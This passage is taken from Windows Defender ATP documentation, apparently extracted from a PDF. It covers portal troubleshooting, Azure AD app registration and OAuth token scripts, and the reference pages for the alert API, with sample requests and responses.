date a Your subscription has expired message will be presented with an option to download the machine
offboarding package, should you choose to not renew the license.
NOTE
For security reasons, the package used to Offboard machines will expire 30 days after the date it was downloaded. Expired
offboarding packages sent to a machine will be rejected. When downloading an offboarding package you will be notified of
the packages expiry date and it will also be included in the package name.
You are not authorized to access the portal

If you receive a You are not authorized to access the portal, be aware that Windows Defender ATP is a security
monitoring, incident investigation and response product, and as such, access to it is restricted and controlled by the
user. For more information see, Assign user access to the portal.
Data currently isn't available on some sections of the portal

If the portal dashboard, and other sections show an error message such as "Data currently isn't available":
You'll need to whitelist the securitycenter.windows.com and all sub-domains under it. For example
*.securitycenter.windows.com .
Portal communication issues

If you encounter issues with accessing the portal, missing data, or restricted access to portions of the portal, you'll
need to verify that the following URLs are whitelisted and open for communciation.
*.blob.core.windows.net crl.microsoft.com
https://*.microsoftonline-p.com
https://*.securitycenter.windows.com
https://automatediracs-eus-prd.securitycenter.windows.com
https://login.microsoftonline.com
https://login.windows.net
https://onboardingpackagescusprd.blob.core.windows.net
https://secure.aadcdn.microsoftonline-p.com
https://securitycenter.windows.com
https://static2.sharepointonline.com
Related topics
Validate licensing provisioning and complete setup for Windows Defender ATP
Applies to:
In this section
TOPIC DESCRIPTION
Windows Defender ATP API overview Learn how to access to Windows Defender ATP Public API and
on which context.
Supported Windows Defender ATP APIs Learn more about the individual supported entities where you
can run API calls to and details such as HTTP request values,
request headers and expected responses. Examples include
APIs for alert resource type, domain related alerts, or even
actions such as isolate machine.
How to use APIs - Samples Learn how to use Advanced hunting APIs and multiple APIs
such as PowerShell. Other examples include schedule
advanced hunting using Microsoft Flow or OData queries.
Windows Defender ATP API overview
Applies to:
Windows Defender ATP exposes much of its data and actions through a set of programmatic APIs. Those
APIs will enable you to automate workflows and innovate based on Windows Defender ATP capabilities.
The API access requires OAuth2.0 authentication. For more information, see OAuth 2.0 Authorization
Code Flow.
You can access Windows Defender ATP API with Application Context or User Context.
Application Context: (Recommended)
Used by apps that run without a signed-in user present. for example, apps that run as background
services or daemons.
Steps that need to be taken to access Windows Defender ATP API with application context:
1. Create an AAD Web-Application.
2. Assign the desired permission to the application, for example, 'Read Alerts', 'Isolate Machines'.
3. Create a key for this Application.
4. Get token using the application with its key.
For more information, see Get access with application context.
User Context:
Used to perform actions in the API on behalf of a user.
Steps that needs to be taken to access Windows Defender ATP API with application context:
1. Create AAD Native-Application.
2. Assign the desired permission to the application, e.g 'Read Alerts', 'Isolate Machines' etc.
3. Get token using the application with user credentials.
For more information, see Get access with user context.
Related topics
Windows Defender ATP API - Hello World
Applies to:
Get Alerts using a simple PowerShell script

How long it takes to go through this example?
It only takes 5 minutes done in two steps:
Application registration
Use examples: only requires copy/paste of a short PowerShell script
Do I need a permission to connect?
For the App registration stage, you must have a Global administrator role in your Azure Active Directory (Azure
AD ) tenant.
Step 1 - Create an App in Azure Active Directory
1. Log on to Azure with your Global administrator user.
2. Navigate to Azure Active Directory > App registrations > New application registration.
3. In the registration form, enter the following information, then click Create.
Name: Choose your own name.
Application type: Web app / API
Redirect URI: https://127.0.0.1
4. Allow your App to access Windows Defender ATP and assign it 'Read all alerts' permission:
Click Settings > Required permissions > Add.
Click Select an API > WindowsDefenderATP, then click Select.

Note: WindowsDefenderATP does not appear in the original list. You need to start writing its name in
the text box to see it appear.
Click Select permissions > Read all alerts > Select.

Click Done
Click Grant permissions

Note: Every time you add permission you must click on Grant permissions.
5. Create a key for your App:
Click Keys, type a key name and click Save.
6. Write down your App ID and your Tenant ID:

App ID:
Tenant ID: Navigate to Azure Active Directory > Properties

Done! You have successfully registered an application!
Step 2 - Get a token using the App and use this token to access the API.
Copy the script below to PowerShell ISE or to a text editor, and save it as "Get-Token.ps1"
Running this script will generate a token and will save it in the working folder under the name "Latest-
token.txt".
# That code gets the App Context Token and save it to a file named "Latest-token.txt" under the current
directory
# Paste below your Tenant ID, App ID and App Secret (App key).
$tenantId = '' ### Paste your tenant ID here

$appId = '' ### Paste your app ID here
$appSecret = '' ### Paste your app key here
$resourceAppIdUri = 'https://api.securitycenter.windows.com'
$oAuthUri = "https://login.windows.net/$TenantId/oauth2/token"
$authBody = [Ordered] @{
resource = "$resourceAppIdUri"
client_id = "$appId"
client_secret = "$appSecret"
grant_type = 'client_credentials'
}
$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
$token = $authResponse.access_token
Out-File -FilePath "./Latest-token.txt" -InputObject $token
return $token
Sanity Check:
Run the script.
In your browser go to: https://jwt.ms/
Copy the token (the content of the Latest-token.txt file).
Paste in the top box.
Look for the "roles" section. Find the Alert.Read.All role.
Lets get the Alerts!
The script below will use Get-Token.ps1 to access the API and will get the past 48 hours Alerts.
Save this script in the same folder you saved the previous script Get-Token.ps1.
The script creates two files (json and csv) with the data in the same folder as the scripts.
# Returns Alerts created in the past 48 hours.
$token = ./Get-Token.ps1 #run the script Get-Token.ps1 - make sure you are running this script from the
same folder of Get-Token.ps1
# Get Alert from the last 48 hours. Make sure you have alerts in that time frame.
$dateTime = (Get-Date).ToUniversalTime().AddHours(-48).ToString("o")
# The URL contains the type of query and the time filter we create above
# Read more about other query options and filters at Https://TBD- add the documentation link
$url = "https://api.securitycenter.windows.com/api/alerts?`$filter=alertCreationTime ge $dateTime"
# Set the WebRequest headers

$headers = @{
'Content-Type' = 'application/json'
Accept = 'application/json'
Authorization = "Bearer $token"
}
# Send the webrequest and get the results.

$response = Invoke-WebRequest -Method Get -Uri $url -Headers $headers -ErrorAction Stop
# Extract the alerts from the results.

$alerts = ($response | ConvertFrom-Json).value | ConvertTo-Json
# Get string with the execution time. We concatenate that string to the output file to avoid overwrite the file
$dateTimeForFileName = Get-Date -Format o | foreach {$_ -replace ":", "."}
# Save the result as json and as csv

$outputJsonPath = "./Latest Alerts $dateTimeForFileName.json"
$outputCsvPath = "./Latest Alerts $dateTimeForFileName.csv"
Out-File -FilePath $outputJsonPath -InputObject $alerts

($alerts | ConvertFrom-Json) | Export-CSV $outputCsvPath -NoTypeInformation
You’re all done! You have just successfully:

Created and registered and application
Granted permission for that application to read alerts
Connected the API
Used a PowerShell script to return alerts created in the past 48 hours
Related topic
Create an app to access Windows Defender ATP
without a user
Applies to:
This page describes how to create an application to get programmatic access to Windows Defender ATP without
a user.
If you need programmatic access Windows Defender ATP on behalf of a user, see Get access wtih user context
If you are not sure which access you need, see Get started.
Windows Defender ATP exposes much of its data and actions through a set of programmatic APIs. Those APIs
will help you automate workflows and innovate based on Windows Defender ATP capabilities. The API access
requires OAuth2.0 authentication. For more information, see OAuth 2.0 Authorization Code Flow.
This page explains how to create an AAD application, get an access token to Windows Defender ATP and validate
the token.
Create an app
1. Log on to Azure with user that has Global Administrator role.
3. In the Create window, enter the following information then click Create.
Name: Choose your own name.
4. Click Settings > Required permissions > Add.
5. Click Select an API > WindowsDefenderATP, then click Select.

Note: WindowsDefenderATP does not appear in the original list. You need to start writing its name in the
text box to see it appear.
6. Click Select permissions > Check the desired permissions > Select.
Important note: You need to select the relevant permissions. 'Run advanced queries' is only an example!
For instance,
To run advanced queries, select 'Run advanced queries' permission
To isolate a machine, select 'Isolate machine' permission
To determine which permission you need, please look at the Permissions section in the API you are
interested to call.
7. Click Done
8. Click Grant permissions

In order to add the new selected permissions to the app, the Admin's tenant must press on the Grant
permissions button.
If in the future you will want to add more permission to the app, you will need to press on the Grant
permissions button again so the changes will take effect.
9. Click Keys, type a key name and click Save.
Important: After you save, copy the key value. You won't be able to retrieve after you leave!
10. Write down your application ID.
11. For Windows Defender ATP Partners only - Set your application to be multi-tenanted
This is required for 3rd party apps (for example, if you create an application that is intended to run in
multiple customers tenant).
This is not required if you create a service that you want to run in your tenant only (for example, if you
create an application for your own usage that will only interact with your own data)
Click Properties > Yes > Save.
Application consent for your multi-tenant App:
You need your application to be approved in each tenant where you intend to use it. This is because your
application interacts with Windows Defender ATP application on behalf of your customer.
You (or your customer if you are writing a 3rd party application) need to click the consent link and approve
your application. The consent should be done with a user who has admin privileges in the active directory.
Consent link is of the form:
https://login.microsoftonline.com/common/oauth2/authorize?prompt=consent&client_id=00000000-0000-0000-
0000-000000000000&response_type=code&sso_reload=true
where 00000000-0000-0000-0000-000000000000 should be replaced with your Azure application ID

Done! You have successfully registered an application!
See examples below for token acquisition and validation.
Get an access token examples:

For more details on AAD token, refer to AAD tutorial
Using PowerShell
# That code gets the App Context Token and save it to a file named "Latest-token.txt" under the current
directory
# Paste below your Tenant ID, App ID and App Secret (App key).
$tenantId = '' ### Paste your tenant ID here

$appId = '' ### Paste your app ID here
$appSecret = '' ### Paste your app key here
}
$token = $authResponse.access_token
Out-File -FilePath "./Latest-token.txt" -InputObject $token
return $token
Using C#:
The below code was tested with nuget Microsoft.IdentityModel.Clients.ActiveDirectory 3.19.8
Create a new Console Application

Install Nuget Microsoft.IdentityModel.Clients.ActiveDirectory
Add the below using
using Microsoft.IdentityModel.Clients.ActiveDirectory;
Copy/Paste the below code in your application (do not forget to update the 3 variables:
tenantId, appId, appSecret )
string tenantId = "00000000-0000-0000-0000-000000000000"; // Paste your own tenant ID here

string appId = "11111111-1111-1111-1111-111111111111"; // Paste your own app ID here
string appSecret = "22222222-2222-2222-2222-222222222222"; // Paste your own app secret here for a
test, and then store it in a safe place!
const string authority = "https://login.windows.net";

const string wdatpResourceId = "https://api.securitycenter.windows.com";
AuthenticationContext auth = new AuthenticationContext($"{authority}/{tenantId}/");

ClientCredential clientCredential = new ClientCredential(appId, appSecret);
AuthenticationResult authenticationResult = auth.AcquireTokenAsync(wdatpResourceId,
clientCredential).GetAwaiter().GetResult();
string token = authenticationResult.AccessToken;
Using Python
Refer to Get token using Python
Using Curl
NOTE
The below procedure supposed Curl for Windows is already installed on your computer
Open a command window

Set CLIENT_ID to your Azure application ID
Set CLIENT_SECRET to your Azure application secret
Set TENANT_ID to the Azure tenant ID of the customer that wants to use your application to access Windows
Defender ATP application
Run the below command:
curl -i -X POST -H "Content-Type:application/x-www-form-urlencoded" -d "grant_type=client_credentials" -d

"client_id=%CLIENT_ID%" -d "scope=https://securitycenter.onmicrosoft.com/windowsatpservice/.default" -d
"client_secret=%CLIENT_SECRET%" "https://login.microsoftonline.com/%TENANT_ID%/oauth2/v2.0/token" -k
You will get an answer of the form:
{"token_type":"Bearer","expires_in":3599,"ext_expires_in":0,"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1N
iIsIn <truncated> aWReH7P0s0tjTBX8wGWqJUdDA"}
Validate the token

Sanity check to make sure you got a correct token:
Copy/paste into JWT the token you get in the previous step in order to decode it
Validate you get a 'roles' claim with the desired permissions
In the screenshot below you can see a decoded token acquired from an app with permissions to all of
Windows Defender ATP's roles:
Choose the API you want to use, for more information, see Supported Windows Defender ATP APIs
Set the Authorization header in the Http request you send to "Bearer {token}" (Bearer is the Authorization
scheme)
The Expiration time of the token is 1 hour (you can send more then one request with the same token)
Example of sending a request to get a list of alerts using C#
var httpClient = new HttpClient();
var request = new HttpRequestMessage(HttpMethod.Get,

"https://api.securitycenter.windows.com/api/alerts");
request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
var response = httpClient.SendAsync(request).GetAwaiter().GetResult();
// Do something useful with the response
Related topics
Supported Windows Defender ATP APIs
Access Windows Defender ATP on behalf of a user
Use Windows Defender ATP APIs
Applies to:
This page describes how to create an application to get programmatic access to Windows Defender ATP on
behalf of a user.
If you need programmatic access Windows Defender ATP without a user, refer to Access Windows Defender ATP
with application context.
If you are not sure which access you need, read the Introduction page.
Windows Defender ATP exposes much of its data and actions through a set of programmatic APIs. Those APIs
will enable you to automate work flows and innovate based on Windows Defender ATP capabilities. The API
access requires OAuth2.0 authentication. For more information, see OAuth 2.0 Authorization Code Flow.
This page explains how to create an AAD application, get an access token to Windows Defender ATP and validate
the token.
NOTE
When accessing Windows Defender ATP API on behalf of a user, you will need the correct App permission and user
permission. If you are not familiar with user permissions on Windows Defender ATP, see Manage portal access using role-
based access control.
TIP
If you have the permission to perform an action in the portal, you have the permission to perform the action in the API.
Create an app
1. Log on to Azure with user that has Global Administrator role.
3. In the Create window, enter the following information then click Create.
Name: -Your app name-

Application type: Native
4. Click Settings > Required permissions > Add.
5. Click Select an API > WindowsDefenderATP, then click Select.

Note: WindowsDefenderATP does not appear in the original list. You need to start writing its name in the
text box to see it appear.
6. Click Select permissions > Check the desired permissions > Select.
IMPORTANT
You need to select the relevant permissions. 'Read alerts' and 'Collect forensics' are only an example. For instance,
To run advanced queries, select 'Run advanced queries' permission

To isolate a machine, select 'Isolate machine' permission
To determine which permission you need, look at the Permissions section in the API you are
interested to call.
7. Click Done
8. Click Grant permissions
In order to add the new selected permissions to the app, the Admin's tenant must press on the Grant
permissions button.
If in the future you will want to add more permission to the app, you will need to press on the Grant
permissions button again so the changes will take effect.
9. Write down your application ID.
Get an access token

For more details on AAD token, refer to AAD tutorial
Using C#
Copy/Paste the below class in your application.
Use AcquireUserTokenAsync method with the your application ID, tenant ID, user name and password
to acquire a token.
namespace WindowsDefenderATP
{
using System.Net.Http;
using System.Text;
using System.Threading.Tasks;
using Newtonsoft.Json.Linq;
public static class WindowsDefenderATPUtils

{
private const string Authority = "https://login.windows.net";
private const string WdatpResourceId = "https://api.securitycenter.windows.com";
public static async Task<string> AcquireUserTokenAsync(string username, string password,

string appId, string tenantId)
{
using (var httpClient = new HttpClient())
{
var urlEncodedBody = $"resource={WdatpResourceId}&client_id=
{appId}&grant_type=password&username={username}&password={password}";
var stringContent = new StringContent(urlEncodedBody, Encoding.UTF8, "application/x-

www-form-urlencoded");
using (var response = await httpClient.PostAsync($"

{Authority}/{tenantId}/oauth2/token", stringContent).ConfigureAwait(false))
{
response.EnsureSuccessStatusCode();
var json = await response.Content.ReadAsStringAsync().ConfigureAwait(false);
var jObject = JObject.Parse(json);
return jObject["access_token"].Value<string>();
}
}
}
}
}
Validate the token

Sanity check to make sure you got a correct token:
Copy/paste into JWT the token you got in the previous step in order to decode it
Validate you get a 'scp' claim with the desired app permissions
In the screenshot below you can see a decoded token acquired from the app in the tutorial:
Choose the API you want to use - Supported Windows Defender ATP APIs
Set the Authorization header in the HTTP request you send to "Bearer {token}" (Bearer is the Authorization
scheme)
The Expiration time of the token is 1 hour (you can send more then one request with the same token)
Example of sending a request to get a list of alerts using C#
var httpClient = new HttpClient();
var request = new HttpRequestMessage(HttpMethod.Get,

"https://api.securitycenter.windows.com/api/alerts");
request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
var response = httpClient.SendAsync(request).GetAwaiter().GetResult();
// Do something useful with the response
Related topics
Supported Windows Defender ATP query APIs
Applies to:
End Point URI and Versioning

End Point URI:
The service base URI is: https://api.securitycenter.windows.com
The queries based OData have the '/api' prefix. For example, to get Alerts you can send GET request to
https://api.securitycenter.windows.com/api/alerts
Versioning:
The API supports versioning.
The current version is V1.0.
To use a specific version, use this format: https://api.securitycenter.windows.com/api/{Version}. For example:
https://api.securitycenter.windows.com/api/v1.0/alerts
If you don't specify any version (e.g., https://api.securitycenter.windows.com/api/alerts ) you will get to the
latest version.
Learn more about the individual supported entities where you can run API calls to and details such as HTTP
request values, request headers and expected responses.
In this section
TOPIC DESCRIPTION
Advanced Hunting Run queries from API.
Alerts Run API calls such as get alerts, alert information by ID, alert
related actor information, alert related IP information, and
alert related machine information.
Domain Run API calls such as get domain related machines, domain
related machines, statistics, and check if a domain is seen in
your organization.
File Run API calls such as get file information, file related alerts,
file related machines, and file statistics.
TOPIC DESCRIPTION
IP Run API calls such as get IP related alerts, IP related

machines, IP statistics, and check if and IP is seen in your
organization.
Machines Run API calls such as find machine information by IP, get
machines, get machines by ID, information about logged on
users, and alerts related to a given machine ID.
User Run API calls such as get alert related user information, user
information, user related alerts, and user related machines.
Related topic
Advanced hunting API
Applies to:
This API allows you to run programmatic queries that you are used to running from Windows Defender ATP
Portal.
Limitations
1. You can only run a query on data from the last 30 days
2. The results will include a maximum of 10,000 rows
3. The number of executions is limited (up to 15 calls per minute, 15 minutes of running time every hour and 4
hours of running time a day)
4. The maximal execution time of a single request is 10 minutes.
Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs
PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME
Application AdvancedQuery.Read.All 'Run advanced queries'
Delegated (work or school account) AdvancedQuery.Read 'Run advanced queries'
NOTE
When obtaining a token using user credentials:
The user needs to have 'View Data' AD role
The user needs to have access to the machine, based on machine group settings (See Create and manage machine
groups for more information)
HTTP request
POST https://api.securitycenter.windows.com/api/advancedqueries/run
Request headers
HEADER VALUE
Authorization Bearer {token}. Required.

HEADER VALUE
Content-Type application/json
Request body
In the request body, supply a JSON object with the following parameters:
PARAMETER TYPE DESCRIPTION
Query Text The query to run. Required.
Response
If successful, this method returns 200 OK, and QueryResponse object in the response body.
Example
Request
Here is an example of the request.
NOTE
For better performance, you can use server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com
POST https://api.securitycenter.windows.com/api/advancedqueries/run
Content-type: application/json
{
"Query":"ProcessCreationEvents
| where InitiatingProcessFileName =~ \"powershell.exe\"
| where ProcessCommandLine contains \"appdata\"
| project EventTime, FileName, InitiatingProcessFileName
| limit 2"
}
Response
Here is an example of the response.
NOTE
The response object shown here may be truncated for brevity. All of the properties will be returned from an actual call.
HTTP/1.1 200 OK
Content-Type: application/json
{
"Schema": [{
"Name": "EventTime",
"Type": "DateTime"
},
{
"Name": "FileName",
"Type": "String"
},
{
"Name": "InitiatingProcessFileName",
"Type": "String"
}],
"Results": [{
"EventTime": "2018-07-09T07:16:26.8017265",
"FileName": "csc.exe",
"InitiatingProcessFileName": "powershell.exe"
},
{
"EventTime": "2018-07-08T19:00:02.7798905",
"FileName": "gpresult.exe",
"InitiatingProcessFileName": "powershell.exe"
}]
}
Troubleshoot issues
Error: (403) Forbidden / (401) Unauthorized
If you get this error when calling Windows Defender ATP API, your token might not include the necessary
permission.
Check [app permissions](exposed-apis-create-app-webapp.md#validate-the-token) or [delegated permissions]

(exposed-apis-create-app-nativeapp.md#validate-the-token) included in your token.
If the 'roles' section in the token does not include the necessary permission:
- The necessary permission to your app might not have been granted. For more information, see [Access Windows
Defender ATP without a user](exposed-apis-create-app-webapp.md#create-an-app) or [Access Windows Defender ATP
on behalf of a user](exposed-apis-create-app-nativeapp.md#create-an-app) or,
- The app was not authorized in the tenant, see [Application consent](exposed-apis-create-app-
webapp.md#application-consent).
Related topic
Advanced Hunting from Portal
Advanced Hunting using PowerShell
Schedule Advanced Hunting
Alert resource type
Applies to:
Represents an alert entity in Windows Defender ATP.
Methods
METHOD RETURN TYPE DESCRIPTION
Get alert Alert Get a single alert object.
List alerts Alert collection List alert collection.
Create alert Alert Create an alert based on event data

obtained from Advanced Hunting.
List related domains Domain collection List URLs associated with the alert.
List related files File collection List the file entities that are associated
with the alert.
List related IPs IP collection List IPs that are associated with the
alert.
Get related machines Machine The machine that is associated with the
alert.
Get related users User The user that is associated with the
alert.
Properties
PROPERTY TYPE DESCRIPTION
id String Alert ID.
incidentId String The Incident ID of the Alert.
assignedTo String Owner of the alert.
severity Enum Severity of the alert. Possible values

are: 'UnSpecified', 'Informational', 'Low',
'Medium' and 'High'.
status Enum Specifies the current status of the alert.

Possible values are: 'Unknown', 'New',
'InProgress' and 'Resolved'.
investigationState Nullable Enum The current state of the investigation.

Possible values are: 'Unknown',
'Terminated', 'SuccessfullyRemediated',
'Benign Failed PartiallyRemediated',
'Running', 'PendingApproval',
'PendingResource',
'PartiallyInvestigated',
'TerminatedByUser',
'TerminatedBySystem', 'Queued',
'InnerFailure', 'PreexistingAlert',
'UnsupportedOs',
'UnsupportedAlertType',
'SuppressedAlert' .
classification Nullable Enum Specification of the alert. Possible

values are: 'Unknown', 'FalsePositive',
'TruePositive'.
determination Nullable Enum Specifies the determination of the alert.

Possible values are: 'NotAvailable',
'Apt', 'Malware', 'SecurityPersonnel',
'SecurityTesting', 'UnwantedSoftware',
'Other'.
category String Category of the alert. The property

values are: 'None', 'SuspiciousActivity',
'Malware', 'CredentialTheft', 'Exploit',
'WebExploit', 'DocumentExploit',
'PrivilegeEscalation', 'Persistence',
'RemoteAccessTool',
'CommandAndControl',
'SuspiciousNetworkTraffic',
'Ransomware', 'MalwareDownload',
'Reconnaissance', 'WebFingerprinting',
'Weaponization', 'Delivery',
'SocialEngineering', 'CredentialStealing',
'Installation', 'Backdoor', 'Trojan',
'TrojanDownloader',
'LateralMovement',
'ExplorationEnumeration',
'NetworkPropagation', 'Exfiltration',
'NotApplicable', 'EnterprisePolicy' and
'General' .
detectionSource string Detection source.
threatFamilyName string Threat family.
title string Alert title.
description String Description of the threat, identified by

the alert.
alertCreationTime DateTimeOffset The date and time (in UTC) the alert
was created.
lastEventTime DateTimeOffset The last occurance of the event that

triggered the alert on the same
machine.
firstEventTime DateTimeOffset The first occurance of the event that

triggered the alert on that machine.
resolvedTime DateTimeOffset The date and time in which the status

of the alert was changed to 'Resolved'.
machineId String ID of a machine entity that is

associated with the alert.
JSON representation
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Alerts",
"id": "121688558380765161_2136280442",
"incidentId": 7696,
"assignedTo": "secop@contoso.com",
"severity": "High",
"status": "New",
"classification": "TruePositive",
"determination": "Malware",
"investigationState": "Running",
"category": "MalwareDownload",
"detectionSource": "WindowsDefenderAv",
"threatFamilyName": "Mikatz",
"title": "Windows Defender AV detected 'Mikatz', high-severity malware",
"description": "Some description"
"alertCreationTime": "2018-11-26T16:19:21.8409809Z",
"firstEventTime": "2018-11-26T16:17:50.0948658Z",
"lastEventTime": "2018-11-26T16:18:01.809871Z",
"resolvedTime": null,
"machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
}
List alerts API
Applies to:
Retrieves a collection of Alerts.
Supports OData V4 queries.
The OData's Filter query is supported on: "Id", "IncidentId", "AlertCreationTime", "Status", "Severity" and
"Category".
See examples at OData queries with Windows Defender ATP
Permissions
Application Alert.Read.All 'Read all alerts'
Application Alert.ReadWrite.All 'Read and write all alerts'
Delegated (work or school account) Alert.Read 'Read alerts'
Delegated (work or school account) Alert.ReadWrite 'Read and write alerts'
NOTE
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The response will include only alerts that are associated with machines that the user can access, based on machine group
settings (See Create and manage machine groups for more information)
HTTP request
GET /api/alerts
Optional query parameters

Method supports $skip and $top query parameters.
Request headers
NAME TYPE DESCRIPTION
Authorization String Bearer {token}. Required.
Request body
Empty
Response
If successful, this method returns 200 OK, and a list of alert objects in the response body.
Example
Request
Improve request performance

NOTE
GET https://api.securitycenter.windows.com/api/alerts
Response
NOTE
{
"value": [
{
"id": "121688558380765161_2136280442",
"incidentId": 7696,
"severity": "High",
"status": "New",
"description": "Some description",
},
{
"id": "441688558380765161_2136280442",
"incidentId": 8633,
"severity": "Low",
"status": "InProgress",
}
]
}
Related topics
OData queries with Windows Defender ATP
Create alert from event API
Applies to:
Enables using event data, as obtained from the Advanced Hunting for creating a new alert entity.
Permissions
Application Alerts.ReadWrite.All 'Read and write all alerts'
NOTE
The user needs to have at least the following role permission: 'Alerts investigation' (See Create and manage roles for more
information)
The user needs to have access to the machine associated with the alert, based on machine group settings (See Create and
manage machine groups for more information)
HTTP request
POST https://api.securitycenter.windows.com/api/alerts/CreateAlertByReference
Request headers
Content-Type String application/json. Required.
Request body
In the request body, supply the following values (all are required):

machineId String Id of the machine on which the event

was identified. Required.
severity String Severity of the alert. The property

values are: 'Low', 'Medium' and 'High'.
Required.
title String Title for the alert. Required.
description String Description of the alert. Required.
recommendedAction String Action that is recommended to be

taken by security officer when analyzing
the alert.
eventTime DateTime(UTC) The time of the event, as obtained from

the advanced query. Required.
reportId String The reportId, as obtained from the

advanced query. Required.
category String Category of the alert. The property

values are: 'None', 'SuspiciousActivity',
'Malware', 'CredentialTheft', 'Exploit',
'WebExploit', 'DocumentExploit',
'PrivilegeEscalation', 'Persistence',
'RemoteAccessTool',
'CommandAndControl',
'SuspiciousNetworkTraffic',
'Ransomware', 'MalwareDownload',
'Reconnaissance', 'WebFingerprinting',
'Weaponization', 'Delivery',
'SocialEngineering', 'CredentialStealing',
'Installation', 'Backdoor', 'Trojan',
'TrojanDownloader', 'LateralMovement',
'ExplorationEnumeration',
'NetworkPropagation', 'Exfiltration',
'NotApplicable', 'EnterprisePolicy' and
'General'.
Response
If successful, this method returns 200 OK, and a new alert object in the response body. If event with the specified
properties (reportId, eventTime and machineId) was not found - 404 Not Found.
Example
Request

NOTE
POST https://api.securitycenter.windows.com/api/alerts/CreateAlertByReference
Content-Length: application/json
{
"machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"severity": "Low",
"title": "test alert",
"description": "test alert",
"recommendedAction": "test alert",
"eventTime": "2018-08-03T16:45:21.7115183Z",
"reportId": "20776",
"category": "None"
}
Update alert
Applies to:
Update the properties of an alert entity.
Permissions
Application Alerts.ReadWrite.All 'Read and write all alerts'
NOTE
The user needs to have at least the following role permission: 'Alerts investigation' (See Create and manage roles for more
information)
HTTP request
PATCH /api/alerts/{id}
Request headers
Content-Type String application/json. Required.
Request body
In the request body, supply the values for the relevant fields that should be updated.Existing properties that are not
included in the request body will maintain their previous values or be recalculated based on changes to other
property values. For best performance you shouldn't include existing values that haven't change.
status String Specifies the current status of the alert.

The property values are: 'New',
'InProgress' and 'Resolved'.
assignedTo String Owner of the alert
classification String Specifies the specification of the alert.

The property values are: 'Unknown',
'FalsePositive', 'TruePositive'.
determination String Specifies the determination of the alert.

The property values are: 'NotAvailable',
'Apt', 'Malware', 'SecurityPersonnel',
'SecurityTesting', 'UnwantedSoftware',
'Other'
Response
If successful, this method returns 200 OK, and the alert entity in the response body with the updated properties. If
alert with the specified id was not found - 404 Not Found.
Example
Request

NOTE
PATCH https://api.securitycenter.windows.com/api/alerts/121688558380765161_2136280442
Content-Type: application/json
{
"assignedTo": "secop2@contoso.com"
}
Response
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Alerts/$entity",
"id": "121688558380765161_2136280442",
"incidentId": 7696,
"assignedTo": "secop2@contoso.com",
"severity": "High",
"status": "New",
}
Get alert information by ID API
Applies to:
Retrieves an alert by its ID.
Permissions
NOTE
information)
HTTP request
GET /api/alerts/{id}
Request headers
Request body
Empty
Response
If successful, this method returns 200 OK, and the alert entity in the response body. If alert with the specified id
was not found - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/alerts/441688558380765161_2136280442
Response
{
"id": "441688558380765161_2136280442",
"incidentId": 8633,
"severity": "Low",
}
Get alert related domain information API
Applies to:
Retrieves all domains related to a specific alert.
Permissions
Application URL.Read.All 'Read URLs'
Delegated (work or school account) URL.Read.All 'Read URLs'
NOTE
information)
HTTP request
GET /api/alerts/{id}/domains
Request headers
Request body
Empty
Response
If successful and alert and domain exist - 200 OK. If alert not found - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/alerts/636688558380765161_2136280442/domains
Response
HTTP/1.1 200 OK
{
"@odata.context": "https://api.securitycenter.windows.com/$metadata#Domains",
"value": [
{
"host": "www.example.com"
}
]
}
Get alert related files information API
Applies to:
Retrieves all files related to a specific alert.
Permissions
Application File.Read.All 'Read file profiles'
Delegated (work or school account) File.Read.All 'Read file profiles'
NOTE
information)
HTTP request
GET /api/alerts/{id}/files
Request headers
Request body
Empty
Response
If successful and alert and files exist - 200 OK. If alert not found - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/alerts/636688558380765161_2136280442/files
Response
HTTP/1.1 200 OK
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Files",
"value": [
{
"sha1": "654f19c41d9662cf86be21bf0af5a88c38c56a9d",
"sha256": "2f905feec2798cee6f63da2c26758d86bfeaab954c01e20ac7085bf55fedde87",
"md5": "82849dc81d94056224445ea73dc6153a",
"globalPrevalence": 33,
"globalFirstObserved": "2018-07-17T18:17:27.5909748Z",
"globalLastObserved": "2018-08-06T16:07:12.9414137Z",
"windowsDefenderAVThreatName": null,
"size": 801112,
"fileType": "PortableExecutable",
"isPeFile": true,
"filePublisher": null,
"fileProductName": null,
"signer": "Microsoft Windows",
"issuer": "Microsoft Development PCA 2014",
"signerHash": "9e284231a4d1c53fc8d4492b09f65116bf97447f",
"isValidCertificate": true
}
]
}
Get alert related IP information API
Applies to:
Retrieves all IPs related to a specific alert.
Permissions
Application Ip.Read.All 'Read IP address profiles'
Delegated (work or school account) Ip.Read.All 'Read IP address profiles'
NOTE
information)
HTTP request
GET /api/alerts/{id}/ips
Request headers
Request body
Empty
Response
If successful and alert and an IP exist - 200 OK. If alert not found - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/alerts/636688558380765161_2136280442/ips
Response
HTTP/1.1 200 OK
{
"@odata.context": "https://api.securitycenter.windows.com/$metadata#Ips",
"value": [
{
"id": "104.80.104.128"
},
{
"id": "23.203.232.228
}
]
}
Get alert related machine information API
Applies to:
Retrieves machine that is related to a specific alert.
Permissions
Application Machine.Read.All 'Read all machine information'
Application Machine.ReadWrite.All 'Read and write all machine information'
Delegated (work or school account) Machine.Read 'Read machine information'
Delegated (work or school account) Machine.ReadWrite 'Read and write machine information'
NOTE
information)
HTTP request
GET /api/alerts/{id}/machine
Request headers
Request body
Empty
Response
If successful and alert and machine exist - 200 OK. If alert not found or machine not found - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/alerts/636688558380765161_2136280442/machine
Response
HTTP/1.1 200 OK
{
